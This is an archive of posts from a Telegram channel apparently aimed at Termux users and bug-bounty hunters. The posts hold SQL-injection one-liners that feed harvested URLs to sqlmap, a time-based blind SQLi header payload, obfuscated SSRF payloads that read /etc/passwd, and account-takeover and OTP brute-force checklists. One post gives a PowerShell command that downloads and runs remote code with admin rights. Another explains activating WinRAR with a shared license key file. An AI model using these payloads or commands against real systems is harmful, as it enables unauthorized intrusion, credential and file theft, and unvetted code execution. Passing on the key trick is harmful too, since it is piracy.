Termux All Command [Telegram Group]
Ir al canal en Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Mostrar más1 332
Suscriptores
+424 horas
+197 días
+5230 días
Archivo de publicaciones
How I stay updated with CVEs 🔥🔥🔥 ?
⚞ curl cvedb.shodan.io/cves | jq | grep "cve_id"
For more details 🔥
curl -s cvedb.shodan.io/cves | jq '[.cves | {cveid: .cve_id, summary: .summary}]'
Techniques and Vulnerabilities to Identify Account Takeover:
1. Pre-Account Takeover
- How to Hunt:
- Register an email without verifying it.
- Register again using a different method (e.g., 'sign up with Google’) with the same email.
- Check if the application links both accounts.
- Try logging in to see if you can access information from the other account.
2. Account Takeover due to Improper Rate Limiting
- How to Hunt:
- Capture the login request.
- Use tools like Burp Suite's Intruder to brute-force the login.
- Analyze the response and length to detect anomalies.
3. Account Takeover by Utilizing Sensitive Data Exposure
- How to Hunt:
- Pay attention to the request and response parts of the application.
- Look for exposed sensitive data like OTPs, hashes, or passwords.
4. Login Vulnerabilities
- Check for:
- Brute-force vulnerabilities.
- Auth misconfigurations.
- OTP brute-forcing.
- JWT misconfigurations.
- SQL injection to bypass authentication.
- Proper validation of OTP or tokens.
5. Password Reset Vulnerabilities
- Check for:
- Brute-force vulnerabilities in password reset OTPs.
- Predictable tokens.
- JWT misconfigurations.
- IDOR vulnerabilities.
- Host header injection.
- Leaked tokens or OTPs in HTTP responses.
- Proper validation of OTP or tokens.
- HTTP parameter pollution (HPP)
6. XSS to Account Takeover
hashtag#bugbounty hashtag#bugbountytips
Oneliners for SQL Injection 💉 :
$ echo http://<TARGET> | waybackurls › target.txt ; python3 sqlidetector.py -f target.txt
$ subfinder -d http://<TARGET> -silent -all | gau —blacklist ttf,woff,svg,png | sort -u I gf sqli › gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt
$ findomain -t http://<TARGET> -q | httpx-silent | anew | waybackurls | gf sqli ›› sqli ; sqlmap -m sqli --batch -- random-agent --level 1
$ cat urls.txt | grep ".php" | sed 's/\. php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl —silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection \e[0m" ; done
- Header-Based Blind SQL injection:
$ cat domain.txt | httpx-silent -H "X-Forwarded-For:
'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'
hashtag#bugbounty hashtag#bugbountytip hashtag#cybersecurity hashtag#sqli
BD
Sign in
How To Increase Max Upload File Size Importing of Large SQL files in Xampp | phpmyadmin : BD
Sign in
How To Increase Max Upload File Size Importing of Large SQL files in Xampp | phpmyadmin : https://www.youtube.com/watch?v=PvSWU9huKDY
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
use this payload for ssrf
Reduce Noise in Burp Suite with This Simple Trick! 🔥
💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
BUG BOUNTY TIPS 💪
Top 10 Websites for Beginners to Know This.
Use For:-
1. Certificate transparency logs.
:- https://crt.sh/
2. Nuclei Templates Directory
:- https://lnkd.in/gCAnE5tR
3. Recon methodology and oneliner commands
:- https://lnkd.in/gqzkZNYN
4. Old HackerOne Reports
:- https://lnkd.in/gSwe-yuf
5. Onelinertips and Tools and Extensions
:- https://lostsec.xyz/
6. Nslookup, whois, and reverse lookup
:- https://ping.eu/
7. Check status code and response headers
:- https://httpstatus.io/
8. Create vulnerability reports
:- https://vulnrepo.com/
9. Blind XSS
:- https://xss.report/
10. Advanced search operators (Google Dorks)
:- https://lnkd.in/g2ahA3YD
hashtag#bugbounty hashtag#bugbountytip
Reduce Noise in Burp Suite with This Simple Trick! 🔥
💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
hashtag#bugbounty hashtag#bugbountytip
Rate Limit Bypasses?
Here are 10 blogs to learn more about it
1. https://lnkd.in/gYK4kyVU
2. https://lnkd.in/gi2QEr8P
3. https://lnkd.in/gMcSYWzw
4. https://lnkd.in/gv7HFEtf
5. https://lnkd.in/gZnq33Cd
6. https://lnkd.in/gsjiv8ff
7. https://lnkd.in/gdd4Q4_y
8. https://lnkd.in/gDwueZ9u
9. https://lnkd.in/gbTvHfFn
10. https://lnkd.in/gv8wYGdJ
I found two vulnerabilities in a public target on HackerOne in just 10 minutes🎯
How I did it :
First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results).
Then I used the httpx-toolkit tool to collect all subdomains returning a 404 status code into one file.
Then I ran ffuf with my custom wordlist on the 404 subdomains, which revealed two interesting URLs:
https://[target].com/swagger/index.html
Then I used the nuclei tool with a Swagger template on the identified URLs and I discovered:
HTML Injection
Cross-Site Scripting (XSS)
#Collected
Search engine for hackers/pentesters
https://shodan.io == servers
https://google.com == dorks
https://wigle.net == wifi networks
https://grey.app == code search
https://app.binaryedge == threat intelligence
https://onyphe.io == server
https://viz.greynoise.io == threat intelligence
https://censys.io == server
https://hunter.io == email addresses
https://fofa.info == threat intelligence
https://zoomeye.org == threat intelligence
https://leakix.net == threat intelligence
https://intelx.io == OSINT
https://app.netlas.io == attack surface
https://searchcode.com == code search
https://urlscan.io == threat intelligence
https://publicwww.com == code search
https://fullhunt.io == attack surface
https://socradar.io == threat intelligence
https://binaryedge.io ==attack surface
https://ivre.rocks == server
https://crt.sh == certificate search
https://vulners.com == vulnerabilities
https://pulsedive.com == threat intelligence
Real Ethical Hacking in 43 Hours: Your Fast-Track to Cybersecurity Mastery
Elevate your cybersecurity career with our comprehensive ethical hacking course.
Key Topics Covered:
* Ethical Hacking Foundations
* Introduction to Ethical Hacking
* Ethical Hacking Steps
* Creating Your Ethical Hacking Lab
* Operating System Fundamentals
* Vulnerability Assessment
* OSINT Techniques
* Storage Media
* Linux Basics
* Linux Shell
* Linux Processes
* Linux Permissions
* Network Security Concepts
* Packet Management Systems
* Network Security
* Linux File System
* Working with Archives
* Working with Processes
* Working with Users
* Networking Fundamentals
* Network Capture
* Network Scanning
* Advanced Networking Topics
* Information Gathering
* Web Application Hacking
* Detecting Web Vulnerabilities
* The Importance of Programming
* C++ and C
* SQL and Relational Databases
* Functions in C++
* Ethical Hacking for Data Scientists
* Ethical Hacking for SQL Datatypes
* Learning Python for Ethical Hacking
Gain hands-on experience with industry-standard tools like Kali Linux, Metasploit, and Nmap. Prepare for and ace certifications like CSEH and CEH.
Download Link: https://lnkd.in/dnXx6G6H
A Chrome extension that keeps track of the injected urls with Blind XSS payloads
🔗 GitHub Link: https://lnkd.in/gmQscCKZ
🔰 Grab Beautiful Fonts For Designing 🔰
https://bestfreefonts.com/
https://fontshare.com/
https://indestructibletype.com/Home.html
https://www.omnibus-type.com/
ENJOY 👍❤️
Credits : SaM
Telegram Scraper
- scrape messages from multiple channels
- download media files
- export data to JSON/CSV formats
- SQLite database storage
https://github.com/unnohwn/telegram-scraper
Complete roadmap for a career in cybersecurity : https://www.cyberseek.org/pathway.html
Wanna Download Free PDF
Read and Download Book
𝟏. 𝐀𝐧𝐧𝐚’𝐬 𝐀𝐫𝐜𝐡𝐢𝐯𝐞 (https://annas-archive.org)
𝟐. 𝐋𝐢𝐛𝐫𝐚𝐫𝐲 𝐆𝐞𝐧𝐞𝐬𝐢𝐬 (http://libgen.is)
𝟑. 𝐙-𝐋𝐢𝐛𝐫𝐚𝐫𝐲 (https://z-lib.id/)
𝟒. 𝐏𝐃𝐅 𝐃𝐫𝐢𝐯𝐞 (https://www.pdfdrive.com)
𝟓. 𝐎𝐩𝐞𝐧 𝐋𝐢𝐛𝐫𝐚𝐫𝐲 (https://openlibrary.org)
𝟔. 𝐏𝐫𝐨𝐣𝐞𝐜𝐭 𝐆𝐮𝐭𝐞𝐧𝐛𝐞𝐫𝐠 (https://www.gutenberg.org)
𝟕. 𝐅𝐫𝐞𝐞-𝐄𝐛𝐨𝐨𝐤𝐬.𝐧𝐞𝐭 (https://www.free-ebooks.net)
𝟖. 𝐁𝐨𝐨𝐤𝐛𝐨𝐨𝐧 (https://bookboon.com)
𝟗. 𝐈𝐧𝐭𝐞𝐫𝐧𝐞𝐭 𝐀𝐫𝐜𝐡𝐢𝐯𝐞 (https://archive.org)
𝟏𝟎. 𝐒𝐜𝐢𝐞𝐧𝐜𝐞𝐃𝐢𝐫𝐞𝐜𝐭 (https://www.sciencedirect.com)
𝟏𝟏. 𝐆𝐨𝐨𝐠𝐥𝐞 𝐁𝐨𝐨𝐤𝐬 (https://books.google.com)
𝟏𝟐. 𝐁𝐃𝐞𝐛𝐨𝐨𝐤𝐬 (https://bdebooks.com/books/)
intext:"𝙈𝙖𝙘𝙝𝙞𝙣𝙚 𝙇𝙚𝙖𝙧𝙣𝙞𝙣𝙜" 𝙛𝙞𝙡𝙚𝙩𝙮𝙥𝙚:𝙥𝙙𝙛
🔰 How To Get WinRAR Lifetime License Key (Without Crack/virus)
🆔 App Name: WinRAR
🅾️ OS: Windows
🌀 Version: Latest
♨️ Premium Version: Yes
1. First Download winrar -> https://www.win-rar.com/
2. Install Winrar App on Your PC
3. Download This Text File rarreg.key
4. Hold windows key and r or just search on windows search "run" and type : C:\Program Files\WinRAR to get into the WinRAR directory.
5. Copy and paste the rarreg.key into this directory and confirm it as admin
Now you have a lifetime license 🔥
#winrar
go to Powershell(Admin):
iwr -useb https://git.io/debloat | iex
you will find this
Get 4 Months Free Spotify!
4 months spotify on H&M site/app
create account, wait for an hour, check rewards.
https://www.spotify.com/uk/ppt/hm4m/
